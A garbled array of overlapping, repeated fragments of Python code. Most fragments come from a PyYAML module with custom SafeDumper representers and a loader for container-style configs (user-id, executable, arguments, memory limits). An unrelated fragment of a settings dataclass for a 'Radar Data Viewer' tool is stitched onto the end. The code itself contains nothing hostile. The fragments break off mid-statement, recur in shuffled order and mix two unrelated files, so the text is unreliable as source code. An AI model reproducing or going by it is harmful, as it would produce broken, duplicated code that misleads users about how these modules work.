Dumper.statedir_repr, Dumper=Dumper)", "class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map',", "lambda self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif", "self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return", "CSafeLoader as BaseLoader except ImportError: from yaml import SafeDumper as BaseDumper from yaml", "SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self,", "except ImportError: from yaml import SafeDumper as BaseDumper from yaml import SafeLoader as", "as BaseDumper from yaml import CSafeLoader as BaseLoader except ImportError: from yaml import", "SafeDumper as BaseDumper from yaml import SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self,", "k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr,", "'__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ == other.__dict__, })", "pass class Statedir(object): pass # Formatting class List(list): pass class Map(dict): pass class", "file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with open(str(filename)) as f: return yaml.load(f,", "yaml import SafeDumper as BaseDumper from yaml import SafeLoader as BaseLoader class Dumper(BaseDumper):", "value): return self.represent_mapping('!' + value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"')", "other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ = type(tag,", "from yaml import CSafeDumper as BaseDumper from yaml import CSafeLoader as BaseLoader except", "x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments',", "as BaseDumper from yaml import SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value):", "'/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in x.items():", "return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k,", "Map(dict): pass class Quoted(str): pass class Toplevel(dict): def format(self): x = self.copy() yield", "pass class Toplevel(dict): def format(self): x = self.copy() yield 'kind', x.pop('kind') yield 'user-id',", "Quoted(str): pass class Toplevel(dict): def format(self): x = self.copy() yield 'kind', x.pop('kind') yield", "self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return", "'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr,", "tag_map_repr(self, value): return self.represent_mapping('!' + value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value),", "Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if", "yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode):", "type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {})", "= type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def", "toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False)", "return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object): pass # Formatting class", "list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v))", "= type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,),", "return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with open(str(filename)) as f: return yaml.load(f, Loader=Loader)", "self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node,", "Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {}) return", "statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def", "map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in value.items()), flow_style=False) def", "{}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node))", "value.format(), flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return", "class Toplevel(dict): def format(self): x = self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id')", "x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in x.items(): yield k, v", "value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object): pass # Formatting", "k, v in x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper)", "x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 'executable',", "yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted,", "node): if isinstance(node, yaml.MappingNode): typ = type(tag, (object,), { '__init__': lambda self, **kwargs:", "typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise", "def dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with open(str(filename)) as f:", "yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in x.items(): yield k, v yaml.add_representer(Statedir,", "isinstance(node, yaml.MappingNode): typ = type(tag, (object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__':", "yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with", "flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' + value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return", "yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in x.items(): yield", "yaml import CSafeLoader as BaseLoader except ImportError: from yaml import SafeDumper as BaseDumper", "as BaseLoader except ImportError: from yaml import SafeDumper as BaseDumper from yaml import", "value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self,", "import SafeDumper as BaseDumper from yaml import SafeLoader as BaseLoader class Dumper(BaseDumper): def", "pass class Quoted(str): pass class Toplevel(dict): def format(self): x = self.copy() yield 'kind',", "def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k,", "yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield", "(list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {}) return", "def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False)", "value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object):", "value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def", "# Formatting class List(list): pass class Map(dict): pass class Quoted(str): pass class Toplevel(dict):", "format(self): x = self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id')", "== other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ =", "Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ =", "return typ(**loader.construct_mapping(node)) elif isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif", "BaseDumper from yaml import SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return", "yaml.SequenceNode): typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ =", "Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ = type(tag, (object,),", "isinstance(node, yaml.SequenceNode): typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ", "+ value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass", "from yaml import CSafeLoader as BaseLoader except ImportError: from yaml import SafeDumper as", "BaseDumper from yaml import CSafeLoader as BaseLoader except ImportError: from yaml import SafeDumper", "return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value):", "v in x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List,", "self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr,", "x = self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield", "yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield", "for k, v in value.items()), flow_style=False) def tag_map_repr(self, value): return self.represent_mapping('!' + value.__class__.__name__,", "Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper)", "(str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None):", "x.pop('arguments'))) for k, v in x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel,", "unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with open(str(filename))", "in x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr,", "yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/')", "x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper)", "else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper)", "yaml.MappingNode): typ = type(tag, (object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda", "yaml import CSafeDumper as BaseDumper from yaml import CSafeLoader as BaseLoader except ImportError:", "'__eq__': lambda self, other: self.__dict__ == other.__dict__, }) yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper) return typ(**loader.construct_mapping(node))", "import SafeLoader as BaseLoader class Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def", "class Map(dict): pass class Quoted(str): pass class Toplevel(dict): def format(self): x = self.copy()", "(object,), { '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ ==", "NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename):", "self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in value.items()), flow_style=False) def tag_map_repr(self, value): return", "ImportError: from yaml import SafeDumper as BaseDumper from yaml import SafeLoader as BaseLoader", "return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in value.items()), flow_style=False) def tag_map_repr(self, value):", "elif isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node)", "for k, v in x.items(): yield k, v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr,", "value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in value.items()), flow_style=False) def tag_map_repr(self,", "import CSafeLoader as BaseLoader except ImportError: from yaml import SafeDumper as BaseDumper from", "self.represent_mapping('!' + value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader):", "def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value,", "x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for", "self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value):", "from yaml import SafeDumper as BaseDumper from yaml import SafeLoader as BaseLoader class", "x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in", "Dumper(BaseDumper): def statedir_repr(self, value): return self.represent_mapping('!Statedir', value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(),", "return self.represent_mapping('!' + value.__class__.__name__, value.__dict__) def quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class", "typ = type(tag, (list,), {}) return typ(loader.construct_sequence(node)) elif isinstance(node, yaml.ScalarNode): typ = type(tag,", "flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map',", "type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data,", "isinstance(node, yaml.ScalarNode): typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\",", "= self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ',", "yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable')", "List(list): pass class Map(dict): pass class Quoted(str): pass class Toplevel(dict): def format(self): x", "def format(self): x = self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id',", "yaml.ScalarNode): typ = type(tag, (str,), {}) return typ(loader.construct_scalar(node)) else: raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type,", "Statedir(object): pass # Formatting class List(list): pass class Map(dict): pass class Quoted(str): pass", "self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v", "tag, node): if isinstance(node, yaml.MappingNode): typ = type(tag, (object,), { '__init__': lambda self,", "Toplevel(dict): def format(self): x = self.copy() yield 'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield", "'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments')))", "pass class Map(dict): pass class Quoted(str): pass class Toplevel(dict): def format(self): x =", "Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ = type(tag, (object,), {", "raise NotImplementedError(node) yaml.add_multi_constructor(\"!\", unknown_type, Loader=Loader) def dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def", "dump(data, file=None): return yaml.dump(Toplevel(data), file, Dumper=Dumper) def read(filename): with open(str(filename)) as f: return", "class Loader(BaseLoader): pass class Statedir(object): pass # Formatting class List(list): pass class Map(dict):", "Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir',", "yield 'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k,", "def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in value.items()), flow_style=False)", "yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ = type(tag,", "'executable', x.pop('executable') yield 'arguments', List(map(Quoted, x.pop('arguments'))) for k, v in x.items(): yield k,", "quoted_repr(self, value): return self.represent_scalar('tag:yaml.org,2002:str', str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object): pass #", "'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir', x.pop('workdir', '/') yield 'executable', x.pop('executable') yield", "v yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper) yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper)", "yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield", "try: from yaml import CSafeDumper as BaseDumper from yaml import CSafeLoader as BaseLoader", "value): return self.represent_sequence('tag:yaml.org,2002:seq', value, flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for", "str(value), style='\"') class Loader(BaseLoader): pass class Statedir(object): pass # Formatting class List(list): pass", "Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag,", "x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares')", "{ '__init__': lambda self, **kwargs: self.__dict__.update(kwargs), '__eq__': lambda self, other: self.__dict__ == other.__dict__,", "Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader, tag, node): if isinstance(node, yaml.MappingNode): typ", "value.__dict__) def toplevel_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', value.format(), flow_style=False) def list_repr(self, value): return self.represent_sequence('tag:yaml.org,2002:seq',", "'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares',", "class List(list): pass class Map(dict): pass class Quoted(str): pass class Toplevel(dict): def format(self):", "Dumper.toplevel_repr, Dumper=Dumper) yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper) yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper) yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper) def unknown_type(loader,", "'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit',", "Loader(BaseLoader): pass class Statedir(object): pass # Formatting class List(list): pass class Map(dict): pass", "'kind', x.pop('kind') yield 'user-id', x.pop('user-id') yield 'group-id', x.pop('group-id') yield 'environ', Map(x.pop('environ')) yield 'memory-limit',", "flow_style=False) def map_repr(self, value): return self.represent_mapping('tag:yaml.org,2002:map', sorted((k, Quoted(v)) for k, v in value.items()),", "'environ', Map(x.pop('environ')) yield 'memory-limit', x.pop('memory-limit') yield 'fileno-limit', x.pop('fileno-limit') yield 'cpu-shares', x.pop('cpu-shares') yield 'workdir',", "import CSafeDumper as BaseDumper from yaml import CSafeLoader as BaseLoader except ImportError: from" ]
[ "tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0)", "str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08,", "\":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color:", "= \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0)", "canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08,", "python # -*- coding: utf-8 -*- \"\"\"Settings dataclass. Holds settings for the visualization", "bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple", "True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05,", "dataclass. Holds settings for the visualization tool during runtime. \"\"\" from dataclasses import", "1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15,", "0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple =", "light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple", "import dataclass @dataclass class Settings: program_title: str = \"Radar Data Viewer\" dark_mode: bool", "the visualization tool during runtime. \"\"\" from dataclasses import dataclass @dataclass class Settings:", "\"\"\"Settings dataclass. Holds settings for the visualization tool during runtime. \"\"\" from dataclasses", "(0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple", "grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float = 0.2 draw_doppler_arrows: bool", "-*- \"\"\"Settings dataclass. Holds settings for the visualization tool during runtime. \"\"\" from", "0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float = 0.2", "dataclass @dataclass class Settings: program_title: str = \"Radar Data Viewer\" dark_mode: bool =", "1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float = 0.2 draw_doppler_arrows:", "str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple =", "for the visualization tool during runtime. \"\"\" from dataclasses import dataclass @dataclass class", "dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05,", "str = \"Radar Data Viewer\" dark_mode: bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\"", "dataclasses import dataclass @dataclass class Settings: program_title: str = \"Radar Data Viewer\" dark_mode:", "0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float =", "Viewer\" dark_mode: bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\"", "0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15,", "\"Radar Data Viewer\" dark_mode: bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str", "visualization tool during runtime. \"\"\" from dataclasses import dataclass @dataclass class Settings: program_title:", "Holds settings for the visualization tool during runtime. \"\"\" from dataclasses import dataclass", "dark_mode: bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color:", "#!/usr/bin/env python # -*- coding: utf-8 -*- \"\"\"Settings dataclass. Holds settings for the", "tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0)", "= (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float = 0.2 draw_doppler_arrows: bool = True", "tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float = 0.2 draw_doppler_arrows: bool =", "= (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color:", "= (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale:", "= True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str = \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple =", "utf-8 -*- \"\"\"Settings dataclass. Holds settings for the visualization tool during runtime. \"\"\"", "tool during runtime. \"\"\" from dataclasses import dataclass @dataclass class Settings: program_title: str", "from dataclasses import dataclass @dataclass class Settings: program_title: str = \"Radar Data Viewer\"", "during runtime. \"\"\" from dataclasses import dataclass @dataclass class Settings: program_title: str =", "settings for the visualization tool during runtime. \"\"\" from dataclasses import dataclass @dataclass", "@dataclass class Settings: program_title: str = \"Radar Data Viewer\" dark_mode: bool = True", "program_title: str = \"Radar Data Viewer\" dark_mode: bool = True dark_stylesheet: str =", "\"\"\" from dataclasses import dataclass @dataclass class Settings: program_title: str = \"Radar Data", "Data Viewer\" dark_mode: bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet: str =", "canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18,", "= \":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05,", "\":/light/stylesheet.qss\" canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0) canvas_dark_mode_clear_color: tuple = (0.05, 0.05,", "Settings: program_title: str = \"Radar Data Viewer\" dark_mode: bool = True dark_stylesheet: str", "(0.05, 0.05, 0.08, 1.0) grid_circle_color: tuple = (0.15, 0.15, 0.18, 1.0) doppler_arrow_scale: float", "coding: utf-8 -*- \"\"\"Settings dataclass. Holds settings for the visualization tool during runtime.", "-*- coding: utf-8 -*- \"\"\"Settings dataclass. Holds settings for the visualization tool during", "class Settings: program_title: str = \"Radar Data Viewer\" dark_mode: bool = True dark_stylesheet:", "= \"Radar Data Viewer\" dark_mode: bool = True dark_stylesheet: str = \":/dark/stylesheet.qss\" light_stylesheet:", "runtime. \"\"\" from dataclasses import dataclass @dataclass class Settings: program_title: str = \"Radar", "# -*- coding: utf-8 -*- \"\"\"Settings dataclass. Holds settings for the visualization tool" ]
